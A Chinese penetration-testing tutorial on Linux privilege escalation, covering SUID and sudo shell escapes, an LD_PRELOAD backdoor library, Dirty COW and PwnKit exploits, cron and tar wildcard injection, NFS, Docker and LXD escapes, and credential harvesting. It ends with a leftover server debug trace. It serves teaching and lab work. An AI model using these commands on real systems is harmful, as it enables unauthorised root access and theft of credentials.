当前位置:首页>Linux>渗透测试技巧(十)| Linux提权全路径:9大经典方法与实战详解

渗透测试技巧(十)| Linux提权全路径:9大经典方法与实战详解

  • 2026-06-29 20:04:01
渗透测试技巧(十)| Linux提权全路径:9大经典方法与实战详解
 Linux提权全路径:9大经典方法与实战详解 

"Copy Fail"漏洞(CVE-2026-31431)持续发酵,影响之大前所未有。我看几乎所有安全媒体都已经发声了,CVSS评分直线上升!"Copy Fail"漏洞本质就是linux系统的一个提权漏洞,前面我已经有文章我已经讲过一些提权方面的基本概念及技能,今天我就展开一下,全面深入的讲讲Linux提权方面九大经典方法与实战详解,欢迎各位大佬点赞、关注、转发!

 一、提权前信息搜集:万丈高楼平地起 

提权不是盲目的,先搜集情报。拿到shell后,第一件事是摸清系统底细。

 1.1 基础信息收集 
bash
# 查看当前用户身份whoami&&id# 查看系统版本和内核uname-acat /etc/issuecat /etc/*release# 查看当前用户sudo权限sudo-l# 查看可用的-shellcat /etc/shells
 1.2 SUID文件扫描 

SUID是提权的黄金入口。查找所有SUID文件:

bash
find / -typef-perm-40002>/dev/nullfind / -typef-perm-u=s2>/dev/null

常见的高危SUID二进制包括:

🔹 find - 可执行任意命令

🔹 vim/nano - 可读写任意文件

🔹 nmap - 可弹出交互shell

🔹 bash/sh - 可获取shell

🔹 python/perl/ruby - 可执行系统命令

🔹 cp/mv/less/more - 可覆盖或读取敏感文件

 1.3 Cron任务检查 
bash
cat /etc/crontabls-la /etc/cron.d/ls-la /etc/cron.daily/ls-la /etc/cron.hourly/cat /var/spool/cron/crontabs/*
 1.4 自动化工具加持 

手动收集慢?交给自动化工具:

bash
# LinPEAS - 最全面的Linux枚举脚本curl-Lhttps://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh|sh# linux-exploit-suggester - 内核漏洞探测curl-shttps://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh|bash

提示:linpeas会用颜色高亮可疑项,绿色=可能提权,黄色=需要进一步检查,红色=高概率成功。

 二、SUID提权:最经典的入口 
 2.1 SUID是什么? 

SUID(Set User ID)是一种特殊权限位。当文件设置了SUID位时,无论谁执行该文件,进程都会以文件所有者的身份运行。

bash
# 查看SUID权限ls-la /usr/bin/passwd# -rwsr-xr-x 1 root root  快速解锁密码
 2.2 GTFOBins:SUID提权的瑞士军刀 

GTFOBins是最权威的SUID/Sudo利用指南。记住这个网站,关键时刻能救命。

 2.3 实战案例:find SUID提权 

假设通过find / -perm -4000发现find命令有SUID位:

bash
# 方法1:exec执行shellfind . -exec /bin/sh-p \; -quit# 方法2:配合/bin/bashfind / -name"*.txt"-exec /bin/bash-p \; -quit

为什么能提权?因为find的-exec参数可以执行任意命令,而SUID使进程以root身份运行。

 2.4 其他常用SUID利用 
二进制
利用命令
vim
vim -c ':!/bin/sh'
less
less /etc/passwd → !/bin/sh
more
more /etc/passwd → !/bin/sh
nmap
nmap --interactive → !sh
python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
perl
perl -e 'exec "/bin/sh";'
ruby
ruby -e 'exec "/bin/sh"'
awk
awk 'BEGIN {system("/bin/sh")}'
tar
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
cp
cp /bin/bash /tmp/bash; chmod +s /tmp/bash
 三、Sudo配置错误提权:NOPASSWD的陷阱 
 3.1 发现Sudo漏洞 
bash
sudo -l

典型输出:

Userwww-datamayrunthefollowingcommands:    (rootNOPASSWD: /usr/bin/vim    (ALLNOPASSWD: /usr/bin/find
 3.2 LD_PRELOAD绕过 

如果sudoers配置了env_keep += LD_PRELOAD,可以利用:

c
// evil.c#include <stdio.h>#include <stdlib.h>#include <unistd.h>void_init() {unsetenv("LD_PRELOAD");setgid(0);setuid(0);system("/bin/bash -p");}
bash
gcc-fPIC-shared-nostartfiles-o /tmp/evil.so /tmp/evil.csudoLD_PRELOAD=/tmp/evil.soapache2
 3.3 常见Sudo提权命令速查 
命令
利用方式
vim/nano
进入后执行!/bin/bash
find
sudo find . -exec /bin/sh \; -quit
less/more
进入后!/bin/sh
awk
awk 'BEGIN {system("/bin/sh")}'
python
python -c 'import os; os.system("/bin/bash")'
perl
perl -e 'exec "/bin/bash";'
env
sudo env /bin/bash
 四、Capabilities提权:现代Linux的提权新思路 
 4.1 什么是Capabilities? 

Linux Capabilities是细粒度的权限机制,将root的特权分成多个小权限。查看当前进程:

bash
getcap-r / 2>/dev/null
 4.2 高危Capabilities 

🔹 cap_setuid - 可设置任意UID

🔹 cap_setgid - 可设置任意GID

🔹 cap_dac_override - 可绕过文件权限检查

🔹 cap_dac_read_search - 可读取任意文件

 4.3 实战案例:python cap_setuid提权 
bash
# 发现python有cap_setuidgetcap-r / 2>/dev/null|greppython# python3 = cap_setuid+ep# 利用python提权python3-c'import os; os.setuid(0); os.system("/bin/bash")'
 五、内核漏洞提权:重头戏来了 

Linux内核漏洞提权历史悠久,其中最著名的两个是Dirty COW和Dirty Pipe。

 5.1 Dirty COW (CVE-2016-5195) - 脏牛漏洞 
 漏洞原理 

Dirty COW是Linux内核中的一个竞态条件漏洞,存在于copy-on-write(COW,写时复制)机制中。

COW是什么?

当进程对只读文件创建MAP_PRIVATE映射并尝试写入时,内核会创建一个私有副本。但Dirty COW发现,在多线程环境下,可以通过madvise()系统调用人为制造竞态条件,使得对只读文件的写入"穿透"COW保护,直接写入原始文件。

技术细节:

1. 攻击线程A通过write()触发缺页中断,尝试写入只读映射

2. 攻击线程B通过madvise(MADV_DONTNEED)释放私有页面

3. 内核在COW机制切换时未能正确检查页面的只读属性

4. 最终写入操作成功修改了原始只读文件

 影响范围 

🔹 内核版本:2.6.22 至 4.8.3(2007年-2016年)

🔹 影响系统:所有Linux发行版,包括Android

🔹 CVSS评分:7.8(高危)

 利用条件 
bash
# 检查内核版本uname-r# 如果是 3.x - 4.8.x,可能受影响
 实战利用 
bash
# 方法1:使用现成exploitsearchsploitdirtycowsearchsploit-m40616gcc-pthreaddirtyc0w.c-odirtyc0w./dirtyc0w /etc/passwd"root2:xxqibyydkD4Lg:0:0:root:/root:/bin/bash"# 方法2:写入SUID后门echo'root:!locked:0:0:root:/root:/bin/bash'> /tmp/passwd./dirtyc0w /etc/passwd"$(cat /tmp/passwd)"
 为什么影响如此之大? 

1. 存在时间长:漏洞潜伏了9年(2007-2016)

2. 影响面广:所有基于Linux内核的系统和设备

3. 利用简单:本地即可利用,不留日志痕迹

4. 可武器化:可远程通过其他漏洞组合实现RCE→提权

 5.2 Dirty Pipe (CVE-2022-0847) - 脏管道漏洞 
 漏洞原理 

Dirty Pipe是Linux 5.8引入的一个漏洞,与pipe(管道)缓冲区的处理有关。

关键点:当向pipe写入数据时,如果使用了O_APPEND标志但pipe缓冲区flags未正确初始化,可能导致数据被写入只读文件的任意位置。

技术细节:

1. 创建pipe,填满环形缓冲区

2. 通过splice()将只读文件内容导入pipe

3. 修改pipe buffer的flags(将"PIPE_BUF_FLAG_CAN_MERGE"位设置为可合并)

4. 向pipe写入数据,这些数据会"回流"到原始只读文件

 影响范围 

🔹 内核版本:5.8 - 5.16.11(2020年-2022年)

🔹 修复版本:5.16.12+、5.15.25+、5.10.102+

 与Dirty COW对比 
特性
Dirty COW
Dirty Pipe
发布时间
2016年10月
2022年3月
影响内核
2.6.22 - 4.8.3
5.8 - 5.16.11
利用复杂度
高(需多线程竞态)
低(可一次成功)
可靠性
低(需多次尝试)
高(稳定可靠)
典型利用
修改/etc/passwd
覆盖/etc/passwd或SUID
 5.3 PwnKit (CVE-2021-4034) - polkit本地提权 

polkit(原名PolicyKit)是Linux系统中的权限管理组件。2022年1月发现polkit存在本地提权漏洞。

漏洞原理:polkit的pkexec程序存在缓冲区溢出,可通过环境变量注入代码。

利用条件:任意本地用户可利用

bash
# 检查版本pkexec--version# 使用exploitwgethttps://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.zipunzipmain.zip&&cdCVE-2021-4034-mainmake&& ./cve-2021-4034
 5.4 Baron Samedit (CVE-2021-3156) - Sudo堆溢出 

漏洞原理:Sudo命令行解析存在堆缓冲区溢出漏洞,通过反斜杠转义字符触发。

影响版本:Sudo 1.8.2 - 1.8.31p2,1.9.0 - 1.9.5p1

 5.5 内核提权注意事项 

警告:内核exploit有崩溃风险!生产环境慎用!

bash
# 1. 先确认内核版本和架构uname-rdpkg--print-architecture# 2. 使用exploit-suggester寻找合适的exploit./linux-exploit-suggester.sh# 3. 查看是否有已知内核exploitsearchsploit"Linux kernel $(uname -r)"
 六、Cron任务提权:定时任务的陷阱 
 6.1 发现可写Cron脚本 
bash
# 查看cron配置cat /etc/crontabls-la /etc/cron.d/# 检查脚本是否可写ls-la /etc/cron.hourly/backup.sh
 6.2 实战案例:可写Cron脚本 

假设发现/etc/cron.hourly/backup.sh全局可写:

bash
# 添加反向shell或SUID后门echo'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash'>> /etc/cron.hourly/backup.sh# 等待执行后获取root/tmp/rootbash-p
 6.3 通配符注入:Tar命令的噩梦 

假设Cron任务为:

* * * * * roottar-zcf /var/backups/backup.tgz /var/www/html/*

攻击步骤:

bash
cd /var/www/html# 创建将被执行的脚本echo'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash'>shell.shchmod +xshell.sh# 创建Tar参数注入文件echo"">"--checkpoint-action=exec=sh shell.sh"echo"">"--checkpoint=1"# 等待cron执行

当tar运行时,命令实际变成:

tar-zcfbackup.tgz--checkpoint=1--checkpoint-action=exec=shshell.shfile1file2...
 七、NFS提权:no_root_squash的代价 
 7.1 发现NFS共享 
bash
cat /etc/exportsshowmount-e <target_ip>
 7.2 no_root_squash是什么? 

默认情况下,NFS会将远程root用户映射为nfsnobody(安全机制)。但no_root_squash选项禁用了这个映射,允许远程root以root身份访问文件。

 7.3 实战案例:NFS提权 
bash
# 假设发现 /mnt/share 配置了 no_root_squash# 在攻击者机器上mkdir /tmp/nfsmount-tnfs <victim_ip>:/mnt/share /tmp/nfscd /tmp/nfs# 创建SUID后门cp /bin/bash .chmod +sbash# 在受害者机器上cd /mnt/share./bash-p  # 获得rootshell
 八、密码与凭据搜集:信息就是力量 
 8.1 历史命令和配置文件 
bash
# Bash历史cat ~/.bash_historycat /root/.bash_history# 配置文件find /home-name"*.conf"-o-name"*.config"-o-name"*.cfg"2>/dev/nullfind /home-name".env"2>/dev/null# SSH密钥ls-la ~/.ssh/cat ~/.ssh/id_rsa
 8.2 数据库配置 
bash
# MySQLcat /etc/mysql/my.cnfcat /var/www/html/config.php# PostgreSQLcat /etc/postgresql/*/main/pg_hba.conf# 所有数据库配置文件find / -name"*.sql"-o-name"*connection*"2>/dev/null
 九、其他提权路径 
 9.1 Docker组提权 
bash
# 方法1:docker socketdockerrun-v /:/mnt-italpinechroot /mnt# 或dockerrun--rm-v /:/hostalpinechroot /hostsh
 9.2 可写的/etc/passwd 
bash
# 检查是否可写ls-la /etc/passwd# 添加root用户echo'root2:xxqibyydkD4Lg:0:0:root:/root:/bin/bash'>> /etc/passwdsuroot2
 9.3 LXD/LXC组提权 
bash
# 如果在lxd组lxcinitubuntu:18.04test-csecurity.privileged=truelxcconfigdeviceaddtestrootdisksource=/ path=/mntrecursive=truelxcstarttestlxcexectestsh# 在容器内 cat /mnt/etc/shadow
 十、提权路径速查表 
提权路径
发现命令
利用难度
成功率
SUID提权
find / -perm -4000
Sudo配置错误
sudo -l
Capabilities
getcap -r / 2>/dev/null
⭐⭐
内核漏洞
uname -r + exploit
⭐⭐⭐
Cron任务
cat /etc/crontab
⭐⭐
NFS配置错误
cat /etc/exports
⭐⭐
密码搜集
手动翻文件
视情况
Docker组
groups
可写/etc/passwd
ls -la /etc/passwd
 总结 

Linux提权是一场系统性的情报战和信息战:

1. 信息搜集是基础 - 摸清系统底细才能找到正确的提权路径

2. SUID和Sudo最常见 - 80%的靶机都可以通过这两个路径解决

3. 内核漏洞是核武器 - Dirty COW/Dirty Pipe威力巨大,但慎用

4. GTFOBins是利器 - 遇到不熟悉的二进制,第一时间去查

5. 自动化工具提效 - LinPEAS能帮你发现肉眼容易遗漏的细节

真正的渗透测试,需要的是耐心、细心和对系统的深入理解。

关注我,持续不断地成长!


往期推荐:

渗透测试技巧(一)| 文件传输
渗透测试技巧(二)| 口令爆破
渗透测试技巧(三)| 信息收集
渗透测试技巧(四)| 反弹shell
渗透测试技巧(五)| Hash相关教程
渗透测试技巧(六)| 代理及转发
渗透测试技巧(七)|  系统提权
渗透测试技巧(八)|  内网横向渗透
渗透测试技巧(九)| 目录爆破

最新文章

随机文章

基本 文件 流程 错误 SQL 调试
  1. 请求信息 : 2026-07-03 09:46:05 HTTP/2.0 GET : https://f.mffb.com.cn/a/490847.html
  2. 运行时间 : 0.093221s [ 吞吐率:10.73req/s ] 内存消耗:4,738.20kb 文件加载:140
  3. 缓存信息 : 0 reads,0 writes
  4. 会话信息 : SESSION_ID=5f398b284fe00040216e93209780cd5e
  1. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/public/index.php ( 0.79 KB )
  2. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/autoload.php ( 0.17 KB )
  3. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_real.php ( 2.49 KB )
  4. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/platform_check.php ( 0.90 KB )
  5. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/ClassLoader.php ( 14.03 KB )
  6. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_static.php ( 4.90 KB )
  7. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper.php ( 8.34 KB )
  8. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/helper.php ( 2.19 KB )
  9. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/helper.php ( 1.47 KB )
  10. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/stubs/load_stubs.php ( 0.16 KB )
  11. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Exception.php ( 1.69 KB )
  12. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Facade.php ( 2.71 KB )
  13. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/deprecation-contracts/function.php ( 0.99 KB )
  14. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap.php ( 8.26 KB )
  15. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap80.php ( 9.78 KB )
  16. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/Resources/functions/dump.php ( 1.49 KB )
  17. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-dumper/src/helper.php ( 0.18 KB )
  18. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/VarDumper.php ( 4.30 KB )
  19. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/App.php ( 15.30 KB )
  20. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Container.php ( 15.76 KB )
  21. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/container/src/ContainerInterface.php ( 1.02 KB )
  22. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/provider.php ( 0.19 KB )
  23. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Http.php ( 6.04 KB )
  24. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Str.php ( 7.29 KB )
  25. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Env.php ( 4.68 KB )
  26. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/common.php ( 0.03 KB )
  27. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/helper.php ( 18.78 KB )
  28. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Config.php ( 5.54 KB )
  29. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/app.php ( 0.95 KB )
  30. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cache.php ( 0.78 KB )
  31. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/console.php ( 0.23 KB )
  32. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cookie.php ( 0.56 KB )
  33. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/database.php ( 2.48 KB )
  34. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Env.php ( 1.67 KB )
  35. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/filesystem.php ( 0.61 KB )
  36. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/lang.php ( 0.91 KB )
  37. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/log.php ( 1.35 KB )
  38. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/middleware.php ( 0.19 KB )
  39. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/route.php ( 1.89 KB )
  40. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/session.php ( 0.57 KB )
  41. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/trace.php ( 0.34 KB )
  42. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/view.php ( 0.82 KB )
  43. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/event.php ( 0.25 KB )
  44. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Event.php ( 7.67 KB )
  45. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/service.php ( 0.13 KB )
  46. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/AppService.php ( 0.26 KB )
  47. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Service.php ( 1.64 KB )
  48. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Lang.php ( 7.35 KB )
  49. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/lang/zh-cn.php ( 13.70 KB )
  50. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/Error.php ( 3.31 KB )
  51. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/RegisterService.php ( 1.33 KB )
  52. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/services.php ( 0.14 KB )
  53. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/PaginatorService.php ( 1.52 KB )
  54. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ValidateService.php ( 0.99 KB )
  55. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ModelService.php ( 2.04 KB )
  56. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Service.php ( 0.77 KB )
  57. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Middleware.php ( 6.72 KB )
  58. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/BootService.php ( 0.77 KB )
  59. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Paginator.php ( 11.86 KB )
  60. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/Validate.php ( 63.20 KB )
  61. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Model.php ( 23.55 KB )
  62. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Attribute.php ( 21.05 KB )
  63. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/AutoWriteData.php ( 4.21 KB )
  64. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Conversion.php ( 6.44 KB )
  65. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/DbConnect.php ( 5.16 KB )
  66. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/ModelEvent.php ( 2.33 KB )
  67. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/RelationShip.php ( 28.29 KB )
  68. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Arrayable.php ( 0.09 KB )
  69. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Jsonable.php ( 0.13 KB )
  70. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/contract/Modelable.php ( 0.09 KB )
  71. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Db.php ( 2.88 KB )
  72. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/DbManager.php ( 8.52 KB )
  73. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Log.php ( 6.28 KB )
  74. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Manager.php ( 3.92 KB )
  75. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerTrait.php ( 2.69 KB )
  76. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerInterface.php ( 2.71 KB )
  77. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cache.php ( 4.92 KB )
  78. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/simple-cache/src/CacheInterface.php ( 4.71 KB )
  79. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Arr.php ( 16.63 KB )
  80. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/driver/File.php ( 7.84 KB )
  81. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/Driver.php ( 9.03 KB )
  82. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/CacheHandlerInterface.php ( 1.99 KB )
  83. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/Request.php ( 0.09 KB )
  84. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Request.php ( 55.78 KB )
  85. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/middleware.php ( 0.25 KB )
  86. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Pipeline.php ( 2.61 KB )
  87. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/TraceDebug.php ( 3.40 KB )
  88. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/middleware/SessionInit.php ( 1.94 KB )
  89. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Session.php ( 1.80 KB )
  90. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/driver/File.php ( 6.27 KB )
  91. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/SessionHandlerInterface.php ( 0.87 KB )
  92. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/Store.php ( 7.12 KB )
  93. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Route.php ( 23.73 KB )
  94. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleName.php ( 5.75 KB )
  95. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Domain.php ( 2.53 KB )
  96. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleGroup.php ( 22.43 KB )
  97. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Rule.php ( 26.95 KB )
  98. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleItem.php ( 9.78 KB )
  99. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/route/app.php ( 1.72 KB )
  100. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Route.php ( 4.70 KB )
  101. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/dispatch/Controller.php ( 4.74 KB )
  102. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Dispatch.php ( 10.44 KB )
  103. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/controller/Index.php ( 4.81 KB )
  104. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/BaseController.php ( 2.05 KB )
  105. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/facade/Db.php ( 0.93 KB )
  106. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/connector/Mysql.php ( 5.44 KB )
  107. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/PDOConnection.php ( 52.47 KB )
  108. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Connection.php ( 8.39 KB )
  109. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/ConnectionInterface.php ( 4.57 KB )
  110. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/builder/Mysql.php ( 16.58 KB )
  111. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Builder.php ( 24.06 KB )
  112. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseBuilder.php ( 27.50 KB )
  113. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Query.php ( 15.71 KB )
  114. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseQuery.php ( 45.13 KB )
  115. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TimeFieldQuery.php ( 7.43 KB )
  116. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/AggregateQuery.php ( 3.26 KB )
  117. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ModelRelationQuery.php ( 20.07 KB )
  118. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ParamsBind.php ( 3.66 KB )
  119. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ResultOperation.php ( 7.01 KB )
  120. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/WhereQuery.php ( 19.37 KB )
  121. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/JoinAndViewQuery.php ( 7.11 KB )
  122. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TableFieldInfo.php ( 2.63 KB )
  123. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/Transaction.php ( 2.77 KB )
  124. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/driver/File.php ( 5.96 KB )
  125. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/LogHandlerInterface.php ( 0.86 KB )
  126. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/Channel.php ( 3.89 KB )
  127. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/event/LogRecord.php ( 1.02 KB )
  128. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/Collection.php ( 16.47 KB )
  129. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/View.php ( 1.70 KB )
  130. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/View.php ( 4.39 KB )
  131. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Response.php ( 8.81 KB )
